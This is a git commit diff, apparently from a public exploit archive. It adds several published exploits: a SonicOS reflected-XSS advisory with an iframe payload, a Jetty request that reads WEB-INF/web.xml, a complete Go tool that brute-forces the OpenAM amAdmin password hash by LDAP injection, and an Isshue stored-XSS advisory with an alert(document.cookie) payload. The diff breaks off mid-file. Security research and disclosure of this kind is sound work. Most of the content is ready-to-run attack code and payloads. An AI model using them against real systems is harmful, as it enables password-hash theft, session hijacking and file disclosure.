DB: 2021-11-04
17 changes to exploits/shellcodes RDP Manager 4.9.9.3 - Denial-of-Service (PoC) PHPJabbers Simple CMS 5 - 'name' Persistent Cross-Site Scripting (XSS) WordPress Plugin Hotel Listing 3 - 'Multiple' Cross-Site Scripting (XSS) Fuel CMS 1.4.1 - Remote Code Execution (3) Eclipse Jetty 11.0.5 - Sensitive File Disclosure WordPress Plugin Popup Anything 2.0.3 - 'Multiple' Stored Cross-Site Scripting (XSS) OpenAM 13.0 - LDAP Injection Simplephpscripts Simple CMS 2.1 - 'Multiple' Stored Cross-Site Scripting (XSS) Simplephpscripts Simple CMS 2.1 - 'Multiple' SQL Injection Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS) PHP Melody 3.0 - 'Multiple' Cross-Site Scripting (XSS) PHP Melody 3.0 - 'vid' SQL Injection Mult-e-Cart Ultimate 2.4 - 'id' SQL Injection PHP Melody 3.0 - Persistent Cross-Site Scripting (XSS) Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS) Vanguard 2.1 - 'Search' Cross-Site Scripting (XSS) Ultimate POS 4.4 - 'name' Cross-Site Scripting (XSS)
This commit is contained in:
parent
7e3fa43161
commit
6829e7f3b7
18 changed files with 3520 additions and 0 deletions
245
exploits/hardware/webapps/50485.txt
Normal file
245
exploits/hardware/webapps/50485.txt
Normal file
|
@ -0,0 +1,245 @@
|
|||
# Exploit Title: Sonicwall SonicOS 6.5.4 - 'Common Name' Cross-Site Scripting (XSS)
|
||||
# Date: 2021-10-18
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://www.sonicguard.com/NSV-800.asp
|
||||
# Version: 6.5.4
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Sonicwall SonicOS 6.5.4 - Cross Site Scripting Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2272
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-18
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2272
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Non Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
The design, implementation and deployment of modern network architectures, such as virtualization and cloud, continue to be a game-changing
|
||||
strategy for many organizations. Virtualizing the data center, migrating to the cloud, or a combination of both, demonstrates significant
|
||||
operational and economic advantages. However, vulnerabilities within virtual environments are well-documented. New vulnerabilities are
|
||||
discovered regularly that yield serious security implications and challenges. To ensure applications and services are delivered safely,
|
||||
efficiently and in a scalable manner, while still combating threats harmful to all parts of the virtual framework including virtual
|
||||
machines (VMs), application workloads and data must be among the top priorities.
|
||||
|
||||
(Copy of the Homepage: https://www.sonicguard.com/NSV-800.asp )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a non-persistent cross site scripting web vulnerability in the SonicWall SonicOS 6.5.4.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Model: SonicWall SonicOS
|
||||
Firmware: 6.5.4.4-44v-21-1288-aa5b8b01 (6.5.4)
|
||||
OS: SonicOS Enhanced
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-07-24: Researcher Notification & Coordination (Security Researcher)
|
||||
2021-07-25: Vendor Notification (Security Department)
|
||||
2021-**-**: Vendor Response/Feedback (Security Department)
|
||||
2021-**-**: Vendor Fix/Patch (Service Developer Team)
|
||||
2021-**-**: Security Acknowledgements (Security Department)
|
||||
2021-10-18: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Guest Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Medium User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A client-side input validation vulnerability has been discovered in the official SonicWall SonicOS 6.5.4.
|
||||
The vulnerability allows remote attackers to hijack sessionc credentials or manipulate client-side requested application content.
|
||||
|
||||
The vulnerability is located in the common name input field in the Decryption Service - Common Name - Show Connection Failures module.
|
||||
Remote attackers with low privileged user accounts can inject own script codes to compromise session credentials. It is also possible
|
||||
to build special crafted html pages with get / post method requests to hijack non-expired user account sessions. The request method to
|
||||
inject is get and the attack vector is located on the client-side without being persistent.
|
||||
|
||||
Successful exploitation of the vulnerability allows remote attackers to hijack session credentials (non-persistent), phishing
|
||||
(non-persistent), external redirect to malicious sources (non-persistent) or client-side application content manipulation.
|
||||
Exploitation of the vulnerability requires low or medium user interaction or a low privileged (restricted) user account.
|
||||
|
||||
Module(s):
|
||||
[+] Decryption Service
|
||||
|
||||
|
||||
Vulnerable Function(s):
|
||||
[+] Edit (Bearbeiten)
|
||||
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] Common Name
|
||||
|
||||
|
||||
Affected Module(s):
|
||||
[+] Show Connection Failures
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The client-side cross site scripting web vulnerability can be exploited by remote attackers with user interaction.
|
||||
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Manual steps to reproduce the vulnerability ...
|
||||
1. Login as restricted or privileged user to the sonicWall sonicOS 6.5.4 virtual firewall application
|
||||
2. Open the Decryption Service > Common Name > Show Connection Failures
|
||||
3. Click on Edit and inject a js test payload into the restricted client content
|
||||
4. Pushing anywhere else outsite field will temporarily save the payload
|
||||
5. The script code immediately executes in the web browsers context
|
||||
5. Successful reproduce of the script code inject web vulnerability!
|
||||
|
||||
|
||||
Vulnerable Source: Connection Failure List (getConnFailureList.json)
|
||||
<div id="connFailureEntriesDiv" style="overflow-y: scroll; height: 544px;">
|
||||
<table summary="" width="100%" cellspacing="0" cellpadding="4" border="0">
|
||||
<tbody id="connFailureEntries"><tr><td class="listItem" width="5%"><input type="checkbox"
|
||||
id="failChk4181252134" class="failChk" data-id="4181251300" data-name="sfPKI-4411CA162CD7931145552C4C87F9603D55FC.22"
|
||||
data-override-name="><iframe src=evil.source onload=alert(document.domain)>" data-failure="7" onclick="onClickFailCheckbox(this);"></td>
|
||||
<td class="listItem" width="15%">192.168.XX.XX</td><td class="listItem" width="15%">XX.XX.XX.XX</td>
|
||||
<td class="listItem" width="30%">>"<iframe src="evil.source" onload="alert(document.domain)"></iframe></td>
|
||||
|
||||
|
||||
|
||||
--- PoC Session Logs (Cookie: SessId=F0FF65AA4C2B22B0655546584DCFAF65) ---
|
||||
https://nsv800.localhost:9281/evil.source
|
||||
Host: nsv800.localhost:9281
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: de,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
Connection: keep-alive
|
||||
Referer: https://nsv800.localhost:9281/sslSpyConfigure.html
|
||||
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
|
||||
Upgrade-Insecure-Requests: 1
|
||||
-
|
||||
GET: HTTP/1.0 200 OK
|
||||
Server: SonicWALL
|
||||
Content-type: text/html;charset=UTF-8
|
||||
-
|
||||
https://nnsv800.localhost:9281/getJsonData.json?dataSet=alertStatus&_=1625248460727
|
||||
Host: nsv800.localhost:9281
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
|
||||
Accept: application/json, text/javascript, */*; q=0.01
|
||||
Accept-Language: de,en-US;q=0.7,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate, br
|
||||
X-Requested-With: XMLHttpRequest
|
||||
Connection: keep-alive
|
||||
Referer: https://nsv800.localhost:9281/logo.html
|
||||
Cookie: temp=; SessId=F0FF65AA4C2B22B0655546584DCFAF65
|
||||
-
|
||||
GET: HTTP/1.0 200 OK
|
||||
Server: SonicWALL
|
||||
Content-type: application/json
|
||||
Accept-Ranges: bytes
|
||||
|
||||
|
||||
Reference(s):
|
||||
nsv800.localhost:9281/main.html
|
||||
nsv800.localhost:9281/getJsonData.json
|
||||
nsv800.localhost:9281/sslSpyConfigure.html
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
The vulnerability can be patched by a secure parse and encode of the client-side reflected script code through getJsonData.json and sslSpyConfigure.
|
||||
The input and output parameters needs to be sanitized to prevent script code injects.
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security risk of the client-side cross site web vulnerability in the sonicwall sonicos series is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability-Lab [Research Team] - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
|
||||
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
|
||||
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
|
||||
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
|
||||
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.
|
||||
|
||||
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
|
||||
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com
|
||||
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
|
||||
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
|
||||
edit our material contact (admin@ or research@) to get a ask permission.
|
||||
|
||||
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY (VULNERABILITY LAB)
|
||||
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
|
||||
LUDWIG-ERHARD STRAßE 4
|
||||
34131 KASSEL - HESSEN
|
||||
DEUTSCHLAND (DE)
|
41
exploits/java/webapps/50478.txt
Normal file
41
exploits/java/webapps/50478.txt
Normal file
|
@ -0,0 +1,41 @@
|
|||
# Exploit Title: Eclipse Jetty 11.0.5 - Sensitive File Disclosure
|
||||
# Date: 2021-11-03
|
||||
# Exploit Author: Mayank Deshmukh
|
||||
# Vendor Homepage: https://www.eclipse.org/jetty/
|
||||
# Software Link: https://repo1.maven.org/maven2/org/eclipse/jetty/jetty-distribution/
|
||||
# Version: 9.4.37 ≤ version < 9.4.43, 10.0.1 ≤ version < 10.0.6, 11.0.1 ≤ version < 11.0.6
|
||||
# Security Advisory: https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm
|
||||
# Tested on: Kali Linux
|
||||
# CVE : CVE-2021-34429
|
||||
# Github POC: https://github.com/ColdFusionX/CVE-2021-34429
|
||||
|
||||
POC - Access WEB-INF/web.xml
|
||||
|
||||
## Request
|
||||
|
||||
GET /%u002e/WEB-INF/web.xml HTTP/1.1
|
||||
Host: localhost:9006
|
||||
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||
Accept-Language: en-US,en;q=0.5
|
||||
Accept-Encoding: gzip, deflate
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
## Response
|
||||
|
||||
HTTP/1.1 200 OK
|
||||
Connection: close
|
||||
Last-Modified: Wed, 03 Nov 2021 08:25:24 GMT
|
||||
Content-Type: application/xml
|
||||
Accept-Ranges: bytes
|
||||
Content-Length: 209
|
||||
Server: Jetty(11.0.5)
|
||||
|
||||
<!DOCTYPE web-app PUBLIC
|
||||
"-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
|
||||
"http://java.sun.com/dtd/web-app_2_3.dtd" >
|
||||
|
||||
<web-app>
|
||||
<display-name>ColdFusionX - Web Application</display-name>
|
||||
</web-app>
|
253
exploits/java/webapps/50480.go
Executable file
253
exploits/java/webapps/50480.go
Executable file
|
@ -0,0 +1,253 @@
|
|||
# Exploit Title: OpenAM 13.0 - LDAP Injection
|
||||
# Date: 03/11/2021
|
||||
# Exploit Author: Charlton Trezevant, GuidePoint Security
|
||||
# Vendor Homepage: https://www.forgerock.com/
|
||||
# Software Link: https://github.com/OpenIdentityPlatform/OpenAM/releases/tag/13.0.0,
|
||||
# https://backstage.forgerock.com/docs/openam/13/install-guide/index.html#deploy-openam
|
||||
# Version: OpenAM v13.0.0
|
||||
# Tested on: go1.17.2 darwin/amd64
|
||||
# CVE: CVE-2021-29156
|
||||
#
|
||||
# This vulnerability allows an attacker to extract a variety of information
|
||||
# (such as a user’s password hash) from vulnerable OpenAM servers via LDAP
|
||||
# injection, using a character-by-character brute force attack.
|
||||
#
|
||||
# https://github.com/guidepointsecurity/CVE-2021-29156
|
||||
# https://nvd.nist.gov/vuln/detail/CVE-2021-29156
|
||||
# https://portswigger.net/research/hidden-oauth-attack-vectors
|
||||
|
||||
package main
|
||||
|
||||
// All of these dependencies are included in the standard library.
|
||||
import (
|
||||
"container/ring"
|
||||
"fmt"
|
||||
"math/rand"
|
||||
"net/http"
|
||||
"net/url"
|
||||
"sync"
|
||||
"time"
|
||||
)
|
||||
|
||||
func main() {
|
||||
// Base URL of the target OpenAM instance
|
||||
baseURL := "http://localhost/openam/"
|
||||
|
||||
// Local proxy (such as Burp)
|
||||
proxy := "http://localhost:8080/"
|
||||
|
||||
// Username whose hash should be dumped
|
||||
user := "amAdmin"
|
||||
|
||||
// Configurable ratelimit
|
||||
// This script can go very, very fast. But it's likely that would overload Burp and the target server.
|
||||
// The default ratelimit of 6 can retrieve a 60 character hash through a proxy in about 5 minutes and
|
||||
// ~1700 requests.
|
||||
rateLimit := 6
|
||||
|
||||
// Beginning of the LDAP injection payload. %s denotes the position of the username.
|
||||
payloadUsername := fmt.Sprintf(".well-known/webfinger?resource=http://x/%s)", user)
|
||||
partURL := fmt.Sprintf("%s%s", baseURL, payloadUsername)
|
||||
|
||||
// Your LDAP injection payloads. %s denotes the position at which the constructed hash + next test character
|
||||
// will be inserted.
|
||||
// These are configured to dump password hashes. But you can reconfigure them to dump other data, such as
|
||||
// usernames/session IDs/etc depending on your use case.
|
||||
// N.B. you will likely need to update the brute-forcing keyspace depending on the data you're trying to dump.
|
||||
testCharPayload := "(sunKeyValue=userPassword=%s*)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
|
||||
testCrackedPayload := "(sunKeyValue=userPassword=%s)(%%2526&rel=http://openid.net/specs/connect/1.0/issuer"
|
||||
|
||||
// The keyspace for brute-forcing individual characters is stored in a ringbuffer
|
||||
// You may need to change how this is initialized depending on the types of data you're
|
||||
// trying to retrieve. By default, this is configured for password hashes.
|
||||
dict := makeRing()
|
||||
|
||||
// Working characters for each step are concatenated with this string. Further tests are conducted
|
||||
// using this value as it's built.
|
||||
// Importantly, if you already have part of the hash you can put it here as a crib. This allows you
|
||||
// to resume a previous brute-forcing session.
|
||||
password := ""
|
||||
|
||||
proxyURL, _ := url.Parse(proxy)
|
||||
|
||||
// You can modify the HTTP client configuration below.
|
||||
// For example, to disable the HTTP proxy or set a different
|
||||
// request timeout value.
|
||||
client := &http.Client{
|
||||
Transport: &http.Transport{
|
||||
Proxy: http.ProxyURL(proxyURL),
|
||||
},
|
||||
Timeout: 30 * time.Second,
|
||||
}
|
||||
|
||||
// Channels used for internal signaling
|
||||
cracked := make(chan string, 1)
|
||||
foundChar := make(chan string, 1)
|
||||
|
||||
wg := &sync.WaitGroup{}
|
||||
wg.Add(1)
|
||||
|
||||
// All hacking tools need a header. You may experience a 10-15x performance improvement
|
||||
// if you replace the flower-covered header with the gothic bleeding/flaming/skull-covered
|
||||
// ASCII art typical of these kinds of tools.
|
||||
printHeader()
|
||||
|
||||
loop:
|
||||
for {
|
||||
select {
|
||||
case <-cracked:
|
||||
// Full hash test succeeds, terminate everything
|
||||
// N.B. this feature does not work, see my comments on checkCracked.
|
||||
fmt.Printf("Cracked! Password hash is: \"%s\"\n", password)
|
||||
wg.Done()
|
||||
break loop
|
||||
|
||||
case char := <-foundChar:
|
||||
// In the event that a test character succeeds, that thread will pass it along in the
|
||||
// foundChar channel to signal success. It's then concatenated with the known-good
|
||||
// password hash and the whole thing is tested in a query
|
||||
// This doesn't work because OpenAM doesn't respond to direct queries containing the password hash
|
||||
// in the manner I expect. But it might still work for other types of data.
|
||||
password += char
|
||||
fmt.Printf("Progress so far: '%s'\n", password)
|
||||
|
||||
// Forgive these very ugly closures
|
||||
go (func(client *http.Client, url, payload *string, password string, cracked *chan string) {
|
||||
// Add random jitter before submitting request
|
||||
time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
|
||||
time.Sleep(1 * time.Second)
|
||||
checkCracked(client, url, payload, &password, cracked)
|
||||
})(client, &partURL, &testCharPayload, password, &cracked)
|
||||
|
||||
default:
|
||||
for i := 0; i < rateLimit-1; i++ {
|
||||
testChar := dict.Value.(string)
|
||||
go (func(client *http.Client, url, payload *string, password, testChar string, foundChar *chan string) {
|
||||
time.Sleep(time.Duration(rand.Intn(3)+3) * time.Microsecond)
|
||||
time.Sleep(1 * time.Second)
|
||||
getChar(client, url, payload, &password, &testChar, foundChar)
|
||||
})(client, &partURL, &testCrackedPayload, password, testChar, &foundChar)
|
||||
dict = dict.Next()
|
||||
}
|
||||
|
||||
time.Sleep(1 * time.Second)
|
||||
}
|
||||
}
|
||||
|
||||
wg.Wait()
|
||||
}
|
||||
|
||||
// checkCracked tests a complete string in a query against the OpenAM server to
|
||||
// determine whether the exact, full hash has been retrieved.
|
||||
// This doesn't actually work, because the server doesn't respond as I'd expect
|
||||
// A better implementation would probably watch until all positions in the ringbuffer
|
||||
// are exhausted in testing and terminate (since there's no way to progress further)
|
||||
func checkCracked(client *http.Client, targetURL, payload, password *string, cracked *chan string) {
|
||||
fullPayload := fmt.Sprintf(*payload, url.QueryEscape(*password))
|
||||
fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)
|
||||
|
||||
req, err := http.NewRequest("GET", fullURL, nil)
|
||||
if err != nil {
|
||||
fmt.Printf("checkCracked: %s", err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
res, err := client.Do(req)
|
||||
if err != nil {
|
||||
fmt.Printf("checkCracked: %s", err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
if res.StatusCode == 200 {
|
||||
*cracked <- *password
|
||||
return
|
||||
}
|
||||
|
||||
if res.StatusCode == 404 {
|
||||
return
|
||||
}
|
||||
|
||||
fmt.Printf("checkCracked: got status code of %d for payload %s", res.StatusCode, payload)
|
||||
}
|
||||
|
||||
// getChar tests a given character at the end position of the configured payload and dumped hash progress.
|
||||
func getChar(client *http.Client, targetURL, payload, password, testChar *string, foundChar *chan string) {
|
||||
// Concatenate test character -> password -> payload -> attack URL
|
||||
combinedPass := url.QueryEscape(fmt.Sprintf("%s%s", *password, *testChar))
|
||||
fullPayload := fmt.Sprintf(*payload, combinedPass)
|
||||
fullURL := fmt.Sprintf("%s%s", *targetURL, fullPayload)
|
||||
|
||||
req, err := http.NewRequest("GET", fullURL, nil)
|
||||
if err != nil {
|
||||
fmt.Printf("getChar: %s", err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
res, err := client.Do(req)
|
||||
if err != nil {
|
||||
fmt.Printf("getChar: %s", err.Error())
|
||||
return
|
||||
}
|
||||
|
||||
if res.StatusCode == 200 {
|
||||
*foundChar <- *testChar
|
||||
return
|
||||
}
|
||||
|
||||
if res.StatusCode == 404 {
|
||||
return
|
||||
}
|
||||
|
||||
fmt.Printf("getChar: got status code of %d for payload %s", res.StatusCode, payload)
|
||||
}
|
||||
|
||||
// makeRing instantiates a ringbuffer and initializes it with test characters common in base64
|
||||
// and password hash encodings.
|
||||
// Bruteforcing on a character-by-character basis can only go as far as your dictionary will take
|
||||
// you, so be sure to update these strings if the keyspace for your use case is different.
|
||||
func makeRing() *ring.Ring {
|
||||
var upcase string = `ABCDEFGHIJKLMNOPQRSTUVWXYZ`
|
||||
var lcase string = `abcdefghijklmnopqrstuvwxyz`
|
||||
var num string = `1234567890`
|
||||
var punct string = `$+/.=`
|
||||
|
||||
var dictionary string = upcase + lcase + num + punct
|
||||
|
||||
buf := ring.New(len(dictionary))
|
||||
|
||||
for _, c := range dictionary {
|
||||
buf.Value = fmt.Sprintf("%c", c)
|
||||
buf = buf.Next()
|
||||
}
|
||||
|
||||
return buf
|
||||
}
|
||||
|
||||
// printHeader is cool.
|
||||
func printHeader() {
|
||||
fmt.Printf(`
|
||||
|
||||
_______ ,---. ,---. .-''-.
|
||||
/ __ \ | / | | .'_ _ \
|
||||
| ,_/ \__)| | | .'/ ( ' ) '
|
||||
,-./ ) | | _ | |. (_ o _) |
|
||||
\ '_ '') | _( )_ || (_,_)___|
|
||||
> (_) ) __\ (_ o._) /' \ .---.
|
||||
( . .-'_/ )\ (_,_) / \ '-' /
|
||||
'-''-' / \ / \ /
|
||||
'._____.' '---' ''-..-'
|
||||
|
||||
.'''''-. .-'''''''-. .'''''-. ,---. .'''''-. .-''''-. ,---. ,--------. .------. .---.
|
||||
/ ,-. \ / ,'''''''. \ / ,-. \ /_ | / ,-. \ / _ _ \ /_ | | _____| / .-. \ \ /
|
||||
(___/ | ||/ .-./ ) \| (___/ | | ,_ | (___/ | || ( ' ) | ,_ | | ) / / '--' | |
|
||||
.' / || \ '_ .')|| .' / ,-./ )| _ _ _ _ .' / | (_{;}_) |,-./ )| | '----. | .----. \ /
|
||||
_.-'_.-' ||(_ (_) _)|| _.-'_.-' \ '_ '') ( ' )--( ' ) _.-'_.-' | (_,_) |\ '_ '')|_.._ _ '. | _ _ '. v
|
||||
_/_ .' || / . \ || _/_ .' > (_) )(_{;}_)(_{;}_)_/_ .' \ | > (_) ) ( ' ) \| ( ' ) \ _ _
|
||||
( ' )(__..--.|| '-''"' || ( ' )(__..--.( . .-' (_,_)--(_,_)( ' )(__..--. '----' |( . .-' _(_{;}_) || (_{;}_) |(_I_)
|
||||
(_{;}_) |\'._______.'/(_{;}_) | '-''-'| (_{;}_) | .--. / / '-''-'| | (_,_) / \ (_,_) /(_(=)_)
|
||||
(_,_)-------' '._______.' (_,_)-------' '---' (_,_)-------' )_____.' '---' '...__..' '...__..' (_I_)
|
||||
|
||||
~ ~ (c) 2021 GuidePoint Security - charlton.trezevant@guidepointsecurity.com ~ ~
|
||||
|
||||
`)
|
||||
}
|
231
exploits/multiple/webapps/50490.txt
Normal file
231
exploits/multiple/webapps/50490.txt
Normal file
|
@ -0,0 +1,231 @@
|
|||
# Exploit Title: Isshue Shopping Cart 3.5 - 'Title' Cross Site Scripting (XSS)
|
||||
# Date: 2021-10-22
|
||||
# Exploit Author: Vulnerability Lab
|
||||
# Vendor Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/
|
||||
# Version: 3.5
|
||||
|
||||
Document Title:
|
||||
===============
|
||||
Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
https://www.vulnerability-lab.com/get_content.php?id=2284
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2021-10-22
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
2284
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
5.1
|
||||
|
||||
|
||||
Vulnerability Class:
|
||||
====================
|
||||
Cross Site Scripting - Persistent
|
||||
|
||||
|
||||
Current Estimated Price:
|
||||
========================
|
||||
500€ - 1.000€
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Multi-store eCommerce shopping cart software is the complete solution for eCommerce business management. It is all in one package for website management
|
||||
with backend admin panel to manage inventory, order, product, invoicing & so on. No need regular monthly subscription fee, get it through one-time payment now.
|
||||
Your eCommerce business frequently changes with the times. All you need is a system that will make your work easier and time-saving. You need the best
|
||||
eCommerce shopping cart software which is flexible, upgradable, affordable. Isshue is a completely secure and fast eCommerce POS system for eCommerce
|
||||
solutions. Isshue is the best choice for any type of e-commerce business, big or small.
|
||||
|
||||
(Copy of the Homepage: https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the Isshue eCommerce Shopping Cart v3.5 web-application.
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
bdtask
|
||||
Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application)
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2021-08-23: Researcher Notification & Coordination (Security Researcher)
|
||||
2021-08-24: Vendor Notification (Security Department)
|
||||
2021-**-**: Vendor Response/Feedback (Security Department)
|
||||
2021-**-**: Vendor Fix/Patch (Service Developer Team)
|
||||
2021-**-**: Security Acknowledgements (Security Department)
|
||||
2021-10-22: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Authentication Type:
|
||||
====================
|
||||
Restricted Authentication (Moderator Privileges)
|
||||
|
||||
|
||||
User Interaction:
|
||||
=================
|
||||
Medium User Interaction
|
||||
|
||||
|
||||
Disclosure Type:
|
||||
================
|
||||
Responsible Disclosure
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A persistent input validation web vulnerability has been discovered in the official Isshue eCommerce Shopping Cart v3.5 web-application.
|
||||
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to
|
||||
web-application requests from the application-side.
|
||||
|
||||
A input validation web vulnerability has been discovered in the title input fields in `new invoice`, `customer` & `stock` modules.
|
||||
The `title` input and parameter allows to inject own malicious script code with persistent attack vector. The content of the input
|
||||
and parameter is insecure validated, thus allows remote attackers with privileged user accounts (manager/keeper/admin) to inject
|
||||
own malformed script code that executes on preview. The request method to inject is post and the attack vector is persistent on
|
||||
the application-side.
|
||||
|
||||
Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects
|
||||
to malicious source and persistent manipulation of affected application modules.
|
||||
|
||||
Request Method(s):
|
||||
[+] POST
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Edit Title
|
||||
|
||||
Vulnerable Input(s):
|
||||
[+] Title
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] title
|
||||
|
||||
Affected Module(s):
|
||||
[+] stock
|
||||
[+] customer
|
||||
[+] invoice
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The persistent input validation web vulnerability can be exploited by remote attackers with keeper account and with low user interaction.
|
||||
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
Vulnerable Source:
|
||||
<div class="row">
|
||||
<div class="col-sm-12 lobipanel-parent-sortable ui-sortable" data-lobipanel-child-inner-id="azO1Fsrq9M">
|
||||
<div class="panel panel-bd lobidrag lobipanel lobipanel-sortable" data-inner-id="azO1Fsrq9M" data-index="0">
|
||||
<div class="panel-heading ui-sortable-handle">
|
||||
<div class="panel-title" style="max-width: calc(100% - 180px);">"[MALICIOUS INJECTED SCRIPT CODE!]<iframe src="evil.source" onload="alert(document.cookie)"></iframe></div>
|
||||
<div class="dropdown"><ul class="dropdown-menu dropdown-menu-right"><li><a data-func="editTitle" data-tooltip="Edit title"
|
||||
data-toggle="tooltip" data-title="Edit title" data-placement="bottom" data-original-title="" title=""><i class="panel-control-icon ti-pencil"></i>
|
||||
<span class="control-title">Edit title</span></a></li><li>
|
||||
<a data-func="unpin" data-tooltip="Unpin" data-toggle="tooltip" data-title="Unpin" data-placement="bottom" data-original-title="" title="">
|
||||
<i class="panel-control-icon ti-move"></i><span class="control-title">Unpin</span></a></li><li>
|
||||
